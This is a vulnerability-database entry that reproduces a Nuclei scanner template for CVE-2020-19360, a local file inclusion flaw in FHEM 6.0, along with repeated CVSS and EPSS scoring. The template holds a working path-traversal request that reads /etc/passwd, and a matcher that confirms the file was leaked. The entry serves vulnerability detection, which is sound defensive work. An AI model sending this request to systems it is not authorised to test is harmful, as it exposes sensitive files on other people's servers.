Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-19360
HistoryNov 13, 2021 - 3:35 a.m.

FHEM 6.0 - Local File Inclusion

2021-11-1303:35:48
ProjectDiscovery
github.com
4

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.049 Low

EPSS

Percentile

92.8%

FHEM version 6.0 suffers from a local file inclusion vulnerability.

id: CVE-2020-19360

info:
  name: FHEM 6.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: FHEM version 6.0 suffers from a local file inclusion vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system.
  remediation: |
    Apply the latest patch or upgrade to a version that is not affected by the vulnerability.
  reference:
    - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md
    - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability
    - https://emreovunc.com/blog/en/FHEM-v6.0-LFI-Vulnerability-01.png
    - https://nvd.nist.gov/vuln/detail/CVE-2020-19360
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-19360
    cwe-id: CWE-22
    epss-score: 0.05104
    epss-percentile: 0.92929
    cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fhem
    product: fhem
  tags: cve,cve2020,fhem,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009a2d8636097293b05f5d8d16d56f8b8c8e8c769609536b589b787cf244da0e45022100ab22552ea20a35ee593281bb817e9e64f75e5b9c49601a0c2b2d2fcb0137a804:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.049 Low

EPSS

Percentile

92.8%

Related for NUCLEI:CVE-2020-19360